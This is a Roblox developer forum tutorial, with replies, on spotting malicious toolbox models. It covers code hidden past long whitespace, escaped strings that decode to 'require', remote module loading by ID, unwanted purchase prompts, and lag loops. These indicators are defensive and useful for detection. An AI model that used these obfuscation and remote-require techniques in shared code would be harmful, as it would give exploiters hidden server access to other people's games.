How to identify a malicious model

Introduction

Hello. I’ve been noticing that a lot of models on the toolbox contain viruses that ruin game performance, so I wanted to share with everyone how to identify these models, in order to make sure that people don’t infect their game with these viruses.

Clarification

The viruses in the models don’t affect your computer in any negative way, and the only thing that they do is decrease game performance, sell something or provide serverside access to exploiters.
Models endorsed by ROBLOX(they have a little badge icon on them in the toolbox) do not contain any of these viruses, so you can use them safely.

So how do I identify a malicious model?

Normally, the people who make infected models hide the viruses very well, by obfuscating the malicious code inside the scripts. The quickest way to identify an infected model is by going into the scripts(don’t worry, we won’t need to do any scripting yet), and check if the scrollbars on the right or on the bottom are bigger than they should be. A good example of this would be:

The scrollbars are way bigger than they should be, since these model makers actually hide code beyond what you first see when you open the script. If I scroll the right amount, I can actually find this piece of code:

The first thing you should notice, is the number between these parentheses.
4696605318
This is actually a ROBLOX model ID, and if we go check out what it is,

1145×529 61.9 KB

We find a script titled MainModule, which means that the script is a module. Uploaded modules can have its functions be run by using require(ModuleID), which can be used to do malicious actions without you(before seeing this post) ever seeing it in Studio.

You may be asking, “How do you know if he’s running the require() function?”, and my answer to you would be that using getfenv() is very suspicious, since it’s unnecessary in many cases. I’d then go on to say that \114\101\113\117\105\114\101 actually means “require” for the Lua compiler, so you can pretty much see that the model maker’s trying to require his module.

Another thing, if you see PromptPurchase() being run without you being aware that the script sells things to the player, then delete it. A good example of this would be Kohl’s Admin model that sold the chair model to everyone.

Rookie Viruses
Rookie viruses include but are not limited to:

• while 1/true do loops without a yielding function
• repeat until loops where the until statement is always false, and the repeat statement contains no yielding function
• A loop that iterates through all players and runsplayer:Kick() without you being aware of such.

Yielding functions include but are not limited to:

• wait()
• coroutine.yield()
• WaitForChild()

Hope I helped! And if I forgot something or made an error in my post, please tell me!

Just because the condition is always true and it never calls wait doesn’t mean that the loop never terminates or yields (wait isn’t the only function that yields).
Consider:

while true do break end
repeat break until false
for i=1,math.huge do break end

local thread = coroutine.wrap(function(i)
    while true do
        i = i + coroutine.yield(i)
    end
end)
print(thread(1)) --> 1
print(thread(2)) --> 3
print(thread(3)) --> 6

Ah, forgot about that. Let me edit my post.

You could also just delete the scripts from the models you put into your game.

Sometimes the scripts actually serve a purpose, though.

Nice tutorial, but the sickening part out of all of this is the number of backdoored models that have remained (botted) on the front page for months.

Even completely infamous accounts like TopQualityModels are still not terminated despite having been botting backdoors on the same account for months.

In reality, infinite loops do get terminated. If they don’t yield for a few seconds, then the game engine stops the script.

However, this doesn’t discount the fact that scripts can still lag servers to the point of being unplayable.

Thank you for this. Now i don’t have to worry about my game being hacked or infected.